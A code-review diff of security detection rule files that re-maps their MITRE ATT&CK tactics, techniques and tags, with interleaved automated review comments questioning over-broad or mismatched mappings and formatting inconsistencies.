@@ -114,38 +114,70 @@ Firewalls and ACLs are critical in controlling network traffic, blocking unautho [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] -id = "T1046" -name = "Network Service Discovery" -reference = "https://attack.mitre.org/techniques/T1046/" +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" + [[rule.threat.technique]] -id = "T1498" -name = "Network Denial of Service" -reference = "https://attack.mitre.org/techniques/T1498/" +id = "T1590" +name = "Gather Victim Network Information" +reference = "https://attack.mitre.org/techniques/T1590/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1498" +name = "Network Denial of Service" +reference = "https://attack.mitre.org/techniques/T1498/" [[rule.threat.technique]] -id = "T1595" -name = "Active Scanning" -reference = "https://attack.mitre.org/techniques/T1595/" +id = "T1499" 
+name = "Endpoint Denial of Service" +reference = "https://attack.mitre.org/techniques/T1499/" -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/ml_high_count_network_events.toml b/rules/ml/ml_high_count_network_events.toml index 84ceaa444bc..788730443c5 100644 --- a/rules/ml/ml_high_count_network_events.toml +++ b/rules/ml/ml_high_count_network_events.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 75 
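Review bot: Replacing T1595 Active Scanning with T1590 Gather Victim Network Information under Reconnaissance makes the mapping less accurate, not more: T1590 is pre-compromise collection from external sources and produces no firewall or ACL denies, whereas a burst of denied connections is exactly the footprint of active scanning. The new Command and Control / T1071 and Exfiltration / T1041 stanzas are also weakly supported — traffic that was denied did not carry C2 or exfiltrate anything — so they should be justified or removed. Suggest restoring `id = "T1595"` / `name = "Active Scanning"` / `reference = "https://attack.mitre.org/techniques/T1595/"` under TA0043 and keeping Discovery / T1046 plus Impact / T1498 and T1499 as the core mappings.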
@@ -110,3 +110,55 @@ Machine learning models analyze network traffic patterns to identify anomalies, - Review and update network access controls and permissions to ensure only authorized users and devices have access to sensitive data and systems. - Implement enhanced monitoring and alerting for similar traffic patterns to improve early detection and response to future incidents.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" + +[[rule.threat.technique]] +id = "T1595" +name = "Active Scanning" +reference = "https://attack.mitre.org/techniques/T1595/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat.technique]] +id = "T1498" +name = "Network Denial of Service" +reference = "https://attack.mitre.org/techniques/T1498/" + diff --git a/rules/ml/ml_linux_anomalous_network_activity.toml b/rules/ml/ml_linux_anomalous_network_activity.toml index b1e1b9fef20..6993543b038 100644 --- a/rules/ml/ml_linux_anomalous_network_activity.toml +++ b/rules/ml/ml_linux_anomalous_network_activity.toml 
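Review bot: The hunk ends with an added empty line after the T1498 `reference` (the lone `+` before the next file header), which leaves a trailing blank line at end of file; the equivalent addition in ml_high_count_events_for_a_host_name.toml in this patch ends on the `reference` line, so drop it for consistency. The four tactics added here (Exfiltration, Discovery, Reconnaissance, Impact) are a defensible reading of a network-event spike, but the rule's `tags` line is outside this hunk — if it does not carry a `Tactic: …` entry per tactic, the tag/tactic correlation check will presumably fail.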
@@ -2,7 +2,7 @@
 creation_date = "2020/03/25"
 integration = ["auditd_manager", "endpoint"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/18"
 
 [rule]
 anomaly_threshold = 50
@@ -82,18 +82,68 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "52afbdc5-db15-485e-bc24-f5707f820c4b" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat.technique]] +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + 
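Review bot: Two of the new `[[rule.threat]]` stanzas (TA0008 Lateral Movement and TA0003 Persistence) carry a tactic but no `[[rule.threat.technique]]`, so they assert a tactic without a technique a defender can act on, and Defense Evasion / T1055 Process Injection is a host-memory behaviour that an anomaly over Linux network activity by process does not observe. Keep Command and Control / T1071 and Exfiltration / T1041, which the network evidence supports, and either add the concrete technique that justifies Lateral Movement and Persistence or drop those stanzas. The same hunk strips `"Tactic: Command and Control"` from `tags` while TA0011 stays in `rule.threat`, diverging from the tag/tactic convention the persistence rules in this patch follow; it also adds a trailing blank line at end of file.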
diff --git a/rules/ml/ml_linux_anomalous_network_port_activity.toml b/rules/ml/ml_linux_anomalous_network_port_activity.toml index 58d52643cb3..be92e900df7 100644 --- a/rules/ml/ml_linux_anomalous_network_port_activity.toml +++ b/rules/ml/ml_linux_anomalous_network_port_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 @@ -72,7 +72,14 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "3c7e32e6-6104-46d9-a06e-da0f8b5795a0" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" note = """## Triage and analysis 
@@ -114,12 +121,39 @@ In Linux environments, network ports facilitate communication between applicatio [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat.technique]] id = "T1571" name = "Non-Standard Port" reference = "https://attack.mitre.org/techniques/T1571/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + diff --git a/rules/ml/ml_low_count_events_for_a_host_name.toml b/rules/ml/ml_low_count_events_for_a_host_name.toml index caedf9aab62..d2128f0bf36 100644 --- a/rules/ml/ml_low_count_events_for_a_host_name.toml +++ b/rules/ml/ml_low_count_events_for_a_host_name.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 75 
@@ -92,3 +92,28 @@ Host-based traffic monitoring is crucial for identifying anomalies in network ac - Monitor network traffic for any signs of unusual activity or attempts to exploit the situation further. - Escalate the incident to the security operations team for a deeper forensic analysis and to determine if additional hosts are affected.""" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0040" +name = "Impact" +reference = "https://attack.mitre.org/tactics/TA0040/" + +[[rule.threat.technique]] +id = "T1499" +name = "Endpoint Denial of Service" +reference = "https://attack.mitre.org/techniques/T1499/" diff --git a/rules/ml/ml_packetbeat_rare_server_domain.toml b/rules/ml/ml_packetbeat_rare_server_domain.toml index 211e1efd87e..21d0d1aac74 100644 --- a/rules/ml/ml_packetbeat_rare_server_domain.toml +++ b/rules/ml/ml_packetbeat_rare_server_domain.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 @@ -81,7 +81,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "17e68559-b274-4948-ad0b-f8415bb31126" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis 
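Review bot: Defense Evasion / T1562 Impair Defenses is the right family for a host that suddenly goes quiet, but the stanza stops at the parent technique; the case this rule most plausibly catches — logging disabled or the agent stopped — has dedicated sub-techniques, so consider adding the one that matches the investigation guide (e.g. `[[rule.threat.technique.subtechnique]]` / `id = "T1562.001"` / `name = "Disable or Modify Tools"`, if that is the intended scenario). Impact / T1499 Endpoint Denial of Service is a reasonable secondary reading of a host that stops emitting events. The rule's `tags` line is outside this hunk and needs `Tactic: Defense Evasion` and `Tactic: Impact` to match.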
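Review bot: The ml_packetbeat_rare_server_domain.toml `tags` line loses `"Tactic: Command and Control"` while the threat section of the same file (following hunks) keeps TA0011 and adds Initial Access, Persistence and Exfiltration, so tags and `rule.threat` now disagree in both directions. Restore the tag and add one per tactic that survives review of the threat hunks, matching the convention the persistence rules in this patch keep.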
@@ -121,6 +121,42 @@ Machine learning models analyze network traffic to identify atypical domain name [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat.technique]] +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" @@ -131,12 +167,16 @@ id = "T1071.001" name = "Web Protocols" reference = "https://attack.mitre.org/techniques/T1071/001/" -[[rule.threat.technique.subtechnique]] -id = "T1071.004" -name = "DNS" -reference = "https://attack.mitre.org/techniques/T1071/004/" +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + diff --git a/rules/ml/ml_rare_destination_country.toml b/rules/ml/ml_rare_destination_country.toml index 0cc3e8c8ee9..7c1f674b243 100644 --- a/rules/ml/ml_rare_destination_country.toml +++ b/rules/ml/ml_rare_destination_country.toml 
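Review bot: Initial Access / T1566 Phishing with both Spearphishing Attachment and Spearphishing Link, plus a technique-less TA0003 Persistence stanza, are being attributed to a rule whose only evidence is a rarely seen server domain; network data cannot distinguish a phishing click from any other first contact and says nothing about persistence, so these stanzas overstate coverage. Remove the TA0001 and TA0003 stanzas, or update the investigation guide to justify them, and keep Command and Control / T1071 which the signal does support.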
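Review bot: The second hunk removes the T1071.004 DNS sub-technique, which is the one most directly tied to a rare server *domain*, while adding Exfiltration / T1041; the latter is reasonable, but the former loses the rule's most precise mapping. Suggest restoring `[[rule.threat.technique.subtechnique]]` / `id = "T1071.004"` / `name = "DNS"` (with `reference = "https://attack.mitre.org/techniques/T1071/004/"`) under the TA0011 stanza alongside T1071.001 Web Protocols. The hunk also adds a trailing blank line at end of file.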
@@ -2,7 +2,7 @@ creation_date = "2021/04/05" integration = ["endpoint", "network_traffic"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 75 @@ -77,7 +77,7 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "35f86980-1fb1-4dff-b311-3be941549c8d" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" note = """## Triage and analysis 
@@ -118,25 +118,67 @@ Machine learning models analyze network logs to identify traffic to uncommon des [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1566.002" +name = "Spearphishing Link" +reference = "https://attack.mitre.org/techniques/T1566/002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat.technique]] id = "T1041" name = "Exfiltration Over C2 Channel" reference = "https://attack.mitre.org/techniques/T1041/" -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat.technique]] +id = "T1048" +name = "Exfiltration Over Alternative Protocol" +reference = "https://attack.mitre.org/techniques/T1048/" + 
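Review bot: Initial Access / T1566 Phishing (with .001 and .002) and a technique-less Persistence stanza are attributed to a rule whose evidence is traffic to an unusual destination country; a geo-rarity signal identifies neither the delivery vector nor persistence, so these stanzas overstate what the detection can claim. Command and Control (T1071, T1105 Ingress Tool Transfer) and Exfiltration (T1041, T1048 Exfiltration Over Alternative Protocol) are well matched and should stay. Since the preceding hunk removes `"Tactic: Command and Control"` and `"Tactic: Exfiltration"` from `tags`, those tags need to come back for the tag set to mirror `rule.threat`; the hunk also ends with a trailing blank line.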
diff --git a/rules/ml/ml_spike_in_traffic_to_a_country.toml b/rules/ml/ml_spike_in_traffic_to_a_country.toml
index a5cf353a99d..9c9c130f549 100644
--- a/rules/ml/ml_spike_in_traffic_to_a_country.toml
+++ b/rules/ml/ml_spike_in_traffic_to_a_country.toml
@@ -2,7 +2,7 @@
 creation_date = "2021/04/05"
 integration = ["endpoint", "network_traffic"]
 maturity = "production"
-updated_date = "2026/03/23"
+updated_date = "2025/11/18"
 
 [rule]
 anomaly_threshold = 75
@@ -112,44 +112,58 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "c7db5533-ca2a-41f6-a8b0-ee98abe0f573" severity = "low" -tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Tactic: Reconnaissance", "Resources: Investigation Guide"] +tags = ["Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Resources: Investigation Guide"] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0010" +name = "Exfiltration" +reference = "https://attack.mitre.org/tactics/TA0010/" + [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - [rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + +[[rule.threat.technique]] +id = "T1046" +name = "Network Service Discovery" +reference = "https://attack.mitre.org/techniques/T1046/" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0043" +name = "Reconnaissance" +reference = "https://attack.mitre.org/tactics/TA0043/" + [[rule.threat.technique]] id = "T1595" name = "Active Scanning" 
reference = "https://attack.mitre.org/techniques/T1595/" -[rule.threat.tactic] -id = "TA0043" -name = "Reconnaissance" -reference = "https://attack.mitre.org/tactics/TA0043/" diff --git a/rules/ml/ml_windows_anomalous_network_activity.toml b/rules/ml/ml_windows_anomalous_network_activity.toml index e2fb8c87705..3df432d3263 100644 --- a/rules/ml/ml_windows_anomalous_network_activity.toml +++ b/rules/ml/ml_windows_anomalous_network_activity.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/18" [rule] anomaly_threshold = 50 
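Review bot: This hunk removes `"Tactic: Command and Control"`, `"Tactic: Exfiltration"` and `"Tactic: Reconnaissance"` from `tags` while keeping all three tactics in `rule.threat` and adding Discovery / T1046, so the tag set no longer reflects the threat mapping; the persistence rules in this patch keep the two in sync (`"Tactic: Persistence"` is added alongside TA0003). Restore the three tags and add `"Tactic: Discovery"`, or drop the tactic-tag convention repository-wide rather than file by file. The reordering of each stanza to put `[rule.threat.tactic]` before its techniques is fine and matches the other ML rules here.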
@@ -79,31 +79,68 @@ The Windows integration allows you to monitor the Windows OS, services, applicat - For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/windows). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Command and Control", "Tactic: Exfiltration", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] id = "T1071" name = "Application Layer Protocol" reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" +id = "T1055" +name = "Process Injection" +reference = "https://attack.mitre.org/techniques/T1055/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" + +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration 
Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + diff --git a/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml b/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml index 11b70e142fa..3df45d5fb94 100644 --- a/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml +++ b/rules/ml/persistence_ml_linux_anomalous_process_all_hosts.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2024/06/18" [rule] anomaly_threshold = 50 @@ -124,3 +124,21 @@ tags = [ "Resources: Investigation Guide", ] type = "machine_learning" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1543" +name = "Create or Modify System Process" +reference = "https://attack.mitre.org/techniques/T1543/" +[[rule.threat.technique.subtechnique]] +id = "T1543.003" +name = "Windows Service" +reference = "https://attack.mitre.org/techniques/T1543/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/ml/persistence_ml_rare_process_by_host_linux.toml b/rules/ml/persistence_ml_rare_process_by_host_linux.toml index cbda6deb409..27b54cff337 100644 --- a/rules/ml/persistence_ml_rare_process_by_host_linux.toml +++ b/rules/ml/persistence_ml_rare_process_by_host_linux.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["auditd_manager", "endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/01/15" [rule] anomaly_threshold = 50 
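Review bot: As with the Linux counterpart in this patch, the new Lateral Movement and Persistence stanzas have no technique under them, and Defense Evasion / T1055 Process Injection is a host-memory behaviour that a Windows network-activity anomaly does not observe; only Command and Control / T1071 and Exfiltration / T1041 are borne out by the data this job uses. Trim to those two or add the specific techniques that justify the others. The hunk also removes `"Tactic: Command and Control"` and `"Tactic: Exfiltration"` from `tags` while both tactics remain in `rule.threat`, and leaves a trailing blank line at end of file.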
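Review bot: The sub-technique appended to persistence_ml_linux_anomalous_process_all_hosts.toml is `T1543.003` / `Windows Service`, which cannot apply to a rule whose integrations are `auditd_manager` and `endpoint` on Linux; the Linux rare-process rule in this same patch uses `T1543.002` / `Systemd Service` with `reference = "https://attack.mitre.org/techniques/T1543/002/"`, and that is the correct sub-technique here. Fix the id, name and reference together. The block is also run straight onto `type = "machine_learning"` with no blank line, has none between the `framework`, technique and sub-technique stanzas, and three in a row before `[rule.threat.tactic]` — the other rules in this directory use one blank line between stanzas, so this looks like a copy-paste artefact worth cleaning up.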
@@ -114,35 +114,31 @@ references = ["https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs risk_score = 21 rule_id = "46f804f5-b289-43d6-a881-9387cf594f75" severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Rule Type: ML", "Rule Type: Machine Learning", "Tactic: Execution", "Tactic: Persistence", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Tactic: Persistence", + "Resources: Investigation Guide", +] type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1569" -name = "System Services" -reference = "https://attack.mitre.org/techniques/T1569/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" - [[rule.threat.technique.subtechnique]] id = "T1543.002" name = "Systemd Service" reference = "https://attack.mitre.org/techniques/T1543/002/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/ml/persistence_ml_rare_process_by_host_windows.toml b/rules/ml/persistence_ml_rare_process_by_host_windows.toml index c237bb227e6..bea679b8ed2 100644 --- a/rules/ml/persistence_ml_rare_process_by_host_windows.toml +++ b/rules/ml/persistence_ml_rare_process_by_host_windows.toml @@ -2,7 +2,7 @@ creation_date = "2020/03/25" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/27" [transform] [[transform.osquery]] 
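Review bot: The new side removes Execution / T1569 System Services together with the `"Tactic: Execution"` tag, so the rule now maps only to Persistence / T1543.002; a rare process on a host is first of all an execution event, so losing the Execution mapping narrows coverage — if that is deliberate, say so in the commit message. Stylistically, the hunk deletes the blank lines between `framework`, the technique and the sub-technique but inserts two before `[rule.threat.tactic]`, which is inconsistent with the one-blank-line layout used by the other rules in this patch; keep a single blank line between stanzas and drop the trailing added blank line at end of file.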
